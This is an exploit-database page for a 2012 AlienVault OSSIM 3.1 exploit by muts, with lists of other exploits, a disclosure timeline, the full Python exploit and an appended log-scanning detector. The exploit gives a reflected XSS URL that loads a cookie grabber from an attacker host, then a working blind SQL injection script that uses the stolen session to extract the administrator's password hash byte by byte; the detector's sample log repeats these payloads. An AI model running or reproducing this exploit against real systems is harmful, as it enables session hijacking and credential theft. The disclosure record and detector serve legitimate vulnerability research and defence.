
"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection"

Author

muts

Platform

php

Release date

2012-07-23

Release Date Title Type Platform Author
2019-07-15 "FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion" webapps php "Mohammed Althibyani"
2019-07-12 "MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting" webapps php "Metin Yunus Kandemir"
2019-07-08 "WordPress Plugin Like Button 1.6.0 - Authentication Bypass" webapps php "Benjamin Lim"
2019-07-08 "Karenderia Multiple Restaurant System 5.3 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-05 "Karenderia Multiple Restaurant System 5.3 - Local File Inclusion" webapps php "Mehmet EMIROGLU"
2019-07-02 "Centreon 19.04 - Remote Code Execution" webapps php Askar
2019-07-01 "ZoneMinder 1.32.3 - Cross-Site Scripting" webapps php "Joey Lane"
2019-07-01 "CiuisCRM 1.6 - 'eventType' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-01 "WorkSuite PRM 2.4 - 'password' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-06-28 "LibreNMS 1.46 - 'addhost' Remote Code Execution" webapps php Askar
2019-06-25 "WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting" webapps php m0ze
2019-06-25 "WordPress Plugin iLive 1.0.4 - Cross-Site Scripting" webapps php m0ze
2019-06-25 "AZADMIN CMS 1.0 - SQL Injection" webapps php "felipe andrian"
2019-06-24 "SeedDMS versions < 5.1.11 - Remote Command Execution" webapps php "Nimit Jain"
2019-06-24 "SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting" webapps php "Nimit Jain"
2019-06-24 "SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting" webapps php "Nimit Jain"
2019-06-24 "dotProject 2.1.9 - SQL Injection" webapps php "Metin Yunus Kandemir"
2019-06-20 "WebERP 4.15 - SQL injection" webapps php "Semen Alexandrovich Lyhin"
2019-06-17 "AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)" remote php AkkuS
2019-06-12 "FusionPBX 4.4.3 - Remote Command Execution" webapps php "Dustin Cobb"
2019-06-11 "phpMyAdmin 4.8 - Cross-Site Request Forgery" webapps php Riemann
2019-06-11 "WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution" webapps php xulchibalraa
2019-06-10 "UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting" webapps php Unk9vvN
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-06-03 "WordPress Plugin Form Maker 1.13.3 - SQL Injection" webapps php "Daniele Scanu"
2019-06-03 "KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities" webapps php SlidingWindow
2019-05-29 "pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Chi Tran"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
Release Date Title Type Platform Author
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2012-08-08 "IBM Proventia Network Mail Security System 2.5 - POST File Read" webapps windows muts
2012-07-24 "Zabbix 2.0.1 - Session Extractor" webapps php muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-23 "Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-22 "ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution" webapps asp muts
2012-07-22 "Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection" webapps php muts
2012-07-21 "SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities" webapps windows muts
2012-07-21 "X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting" webapps php muts
2012-03-23 "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" webapps php muts
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution" remote linux muts
2012-07-21 "AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution" remote linux muts
2012-05-01 "SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection" remote windows muts
2009-09-01 "Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow" remote windows muts
2008-12-10 "Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow" remote windows muts
2008-07-12 "Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)" remote linux muts
2008-04-02 "HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)" remote windows muts
2008-03-26 "Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)" remote windows muts
2008-03-26 "TFTP Server 1.4 - ST Buffer Overflow" remote windows muts
2007-12-12 "HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow" remote windows muts
2007-11-26 "Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal" remote windows muts
2007-10-27 "IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow" remote windows muts
2007-06-03 "IBM Tivoli Provisioning Manager - Remote Overflow (Egghunter)" remote windows muts
2007-03-31 "IBM Lotus Domino Server 6.5 - Remote Overflow" remote windows muts
2007-03-21 "Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)" remote windows muts
2006-10-01 "McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)" remote windows muts
2006-08-26 "Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow" remote windows muts
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/20062/?format=json')

{"url": "https://www.nmmapper.com/api/exploitdetails/20062/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/20062/26681/alienvault-open-source-siem-ossim-31-reflected-cross-site-scripting-blind-sql-injection/download/", "exploit_id": "20062", "exploit_description": "\"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection\"", "exploit_date": "2012-07-23", "exploit_author": "muts", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}

#!/usr/bin/python

'''
AlienVault has a reflected XSS vulnerability in the "url" parameter of "top.php".

Proof of Concept:

Enticing a logged-in user to visit the following URL, where an attacker is hosting a cookie grabber, will allow the user's session to be hijacked:

https://victim/ossim/top.php?option=3&soption=3&url=<script src=http://attacker/grabber.js></script>

With a cookie captured and a session hijacked, the blind SQL injection vulnerability in the "tcp_port" parameter of "base_qry_main.php" can be exploited to extract the admin hash.

Timeline:

# 28 May 2012: Vulnerability reported to CERT
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 23 Jul 2012: Update from CERT: No response from AlienVault
# 23 Jul 2012: Public Disclosure

Special Thanks to Tal Zeltzer

When we access the vulnerable script at:

https://victim/ossim/forensics/base_qry_main.php

with an invalid SQL statement in tcp_port[0][0], we see that there is an SQL injection vulnerability.
[Todo]: Add here description on how we got the original query
We concluded that since magic_quotes_gpc is enabled it will be difficult to obtain a shell quickly.
We decided to take a different approach: we modify the query so that it only returns rows
if a specific field we are interested in has X as the Nth byte.
To optimize the speed we used a 'binary search'.
What we do is (n being the Nth byte of the result string):
    - check if X equals n
    - if it's not, check if X is bigger than n
    - if it's not, X is smaller than n

We used this algorithm to extract data from files using the LOAD_FILE function.
We also used this algorithm to extract the admin MD5 hashed password.
'''
import sys,urllib2,urllib

# Example 
# https://victim/ossim/forensics/base_qry_main.php?tcp_port[0][0]=1=1) and 2 = mid((select pass from ossim.users where login=0x61646d696e),1,1)--&tcp_port[0][1]=layer4_dport&tcp_port[0][2]==&tcp_port[0][3]=17500&tcp_port[0][4]= &tcp_port[0][5]= &tcp_flags[0]= &layer4=TCP&num_result_rows=-1&current_view=-1&submit=QUERYDBP&sort_order=sig_a&clear_allcriteria=1&clear_criteria=time

target = 'https://victim/ossim/forensics/base_qry_main.php'
cookie = 'PHPSESSID=072af2ba52959b1602cc8fa864081d01'
debug = False

#
# We use this function to output debug information if required
#
def debugOut(msg, newLine = True):  # Parameter named 'msg' so the builtin 'str' is not shadowed
    if debug == True:
        if newLine == True:
            print msg
        else:
            print msg,

#
# Injects the given sql-query and check if the results were 'True' or 'False'
#
def sendSql(query):
    global target, cookie           # We use the cookie and the target variables as globals
    debugOut("Query: %s" % query)   # Print the query we execute for debugging
    
    values = { 'tcp_port[0][0]': query,             # This is our injection parameter
               'tcp_port[0][1]': 'layer4_dport',
               'tcp_port[0][2]': '=',
               'tcp_port[0][3]': 17500,
               'tcp_port[0][4]': ' ',
               'tcp_port[0][5]': ' ',
               'tcp_flags[0]': ' ',
               'layer4': 'TCP',
               'num_result_rows': -1,
               'current_view': -1,
               'submit': 'QUERYDBP',
               'sort_order': 'sig_a',
               'clear_allcriteria': 1,
               'clear_criteria': 'time' }

    url = "%s?%s" % (target, urllib.urlencode(values))  # Create the request url
    req = urllib2.Request(url)                          # Create a request for the specified url
    req.add_header('Cookie', cookie)                    # Add the cookie we stole using XSS to identify ourselves
    try:                                                # Exception handling
        response = urllib2.urlopen(req)                 # Send the request and save the response object
    except IOError as e:                                # urllib2.URLError/HTTPError and socket errors are IOErrors
        print 'Failed to SQL inject: %s' % e            # Notify the user that there was an error
        sys.exit(-1)                                    # Stop execution of our exploit
    data = response.read()                  # Read the response data
                                            # If the string 'No events...' is in not in our data the query is 'True'
    return('No events matching your search criteria have been found' not in data)

#
# This function enumerates the value of a single nibble out of the admin hash
# It uses the "binary search" algorithm to narrow down the number of requests we send
#
def enumerateNibble(subQuery, location, iMin = 0x00, iMax = 0x0F):
    n = (iMin + iMax) / 2               # Get the middle of our range 
    debugOut('Trying %d' % n, False)    # Notify which value we are comparing the nibble to
                                # Test if the current value equals the nibble     
    if sendSql('1=1) and %s = cast(conv(mid(%s,%d,1), 16, 10) as unsigned integer)--' % (n, subQuery, location)) == True:
        debugOut('Equals!')             # If it is, notify 
        return(hex(n)[2:])              # Return the hex representation of the nibble's value
                                # Test if the current value is bigger than the nibble                                    
    elif sendSql('1=1) and %s > cast(conv(mid(%s,%d,1),16,10) as unsigned integer)--' % (n, subQuery, location)) == True:
        debugOut('Bigger than')                                     # If it is, notify
        return(enumerateNibble(subQuery, location, iMin, n - 1))    # Use recursion to try again with the new reduced range
    else:                       # If the current value is smaller than the nibble
        debugOut('Smaller than')                                    # If it is, notify
        return(enumerateNibble(subQuery, location, n + 1, iMax))    # Use recursion to try again with the new reduced range

#
# Do the actual enumeration of the admin-hash
#
def enumerateAdminHash():
    adminHash = ''          # Initialize the result (named so the builtin 'hash' is not shadowed)
    for i in range(1,33):   # Iterate from 1 to 32 (the number of hex characters in an MD5 hash)
                            # Append the nibble we enumerate from the given query
                            # (this query retrieves the administrator's hash, obviously..)
        adminHash += str(enumerateNibble('(select pass from ossim.users where login=0x61646d696e)', i))
        print 'At %d, So far: %s' % (i, adminHash)  # Notify about our progress
    return(adminHash)       # When done, return the hash we enumerated


print "Trying to dump the administrator's hash"
print "Note: If we get stuck or get invalid results it's probably due to an invalid session"
adminHash = enumerateAdminHash()
print "Administrator MD5 hash:"
print "admin:%s" % adminHash
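As an added defender-side example (not part of muts' exploit or of OSSIM itself), the Python 3 script below scans web-server access-log lines for the two sinks described above: markup in the "url" parameter of top.php, and SQL syntax in the tcp_port[...] values sent to base_qry_main.php. It also flags clients whose repeated boolean injections look like the byte-at-a-time extraction the script performs. The log lines, IPs and the attacker.invalid host are constructed for illustration, and the combined-log layout is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined-log style); IPs and hosts are made up for illustration.
SAMPLE_LOG = """\
10.0.0.9 - - [23/Jul/2012:10:00:02 +0000] "GET /ossim/top.php?option=3&soption=3&url=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker.invalid%2Fgrabber.js%3E%3C%2Fscript%3E HTTP/1.1" 200 600
10.0.0.9 - - [23/Jul/2012:10:01:00 +0000] "GET /ossim/forensics/base_qry_main.php?tcp_port%5B0%5D%5B0%5D=1%3D1%29+and+7+%3E+cast%28conv%28mid%28%28select+pass+from+ossim.users+where+login%3D0x61646d696e%29%2C1%2C1%29%2C16%2C10%29+as+unsigned+integer%29--&tcp_port%5B0%5D%5B1%5D=layer4_dport&layer4=TCP HTTP/1.1" 200 2048
10.0.0.9 - - [23/Jul/2012:10:01:01 +0000] "GET /ossim/forensics/base_qry_main.php?tcp_port%5B0%5D%5B0%5D=1%3D1%29+and+3+%3D+cast%28conv%28mid%28%28select+pass+from+ossim.users+where+login%3D0x61646d696e%29%2C1%2C1%29%2C16%2C10%29+as+unsigned+integer%29--&tcp_port%5B0%5D%5B1%5D=layer4_dport&layer4=TCP HTTP/1.1" 200 2048
10.0.0.5 - - [23/Jul/2012:10:01:05 +0000] "GET /ossim/forensics/base_qry_main.php?tcp_port%5B0%5D%5B0%5D=80&tcp_port%5B0%5D%5B1%5D=layer4_dport&tcp_port%5B0%5D%5B2%5D=%3D&layer4=TCP HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# SQL functions, comment terminators and boolean glue that never belong in a port filter.
SQL_RE = re.compile(r'\b(select|union|mid|conv|cast|load_file|sleep|benchmark)\s*\(|--|/\*|\)\s+(and|or)\s', re.I)
# Markup or script handlers in a value that should be a relative page path.
HTML_RE = re.compile(r'<\s*/?\s*[a-z]|javascript:|\son[a-z]+\s*=', re.I)

def classify_request(target):
    """Return finding tags for one request target (path + query); [] means clean."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes keys and values
    path = parts.path.lower()
    findings = []
    if path.endswith('/top.php'):
        # Reflected XSS sink: the 'url' parameter of top.php.
        if any(HTML_RE.search(v) for v in params.get('url', [])):
            findings.append('xss:top.php:url')
    if path.endswith('/base_qry_main.php'):
        # Blind SQLi sink: the tcp_port[...] array values of base_qry_main.php.
        for key, values in params.items():
            if key.startswith('tcp_port[') and any(SQL_RE.search(v) for v in values):
                findings.append('sqli:base_qry_main.php:' + key)
    return findings

def scan_log(text):
    """Map each client IP to the findings across all of its requests (clean IPs are omitted)."""
    hits = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for tag in classify_request(m.group('target')):
            hits.setdefault(m.group('ip'), []).append(tag)
    return hits

def extraction_bursts(hits, threshold=2):
    # Boolean blind extraction needs several injections per recovered nibble, so repeats are the signal.
    return sorted(ip for ip, tags in hits.items()
                  if sum(t.startswith('sqli:') for t in tags) >= threshold)
```

Running scan_log(SAMPLE_LOG) reports only 10.0.0.9, with one XSS and two SQLi findings, and extraction_bursts() singles that client out; the legitimate port filter from 10.0.0.5 produces nothing.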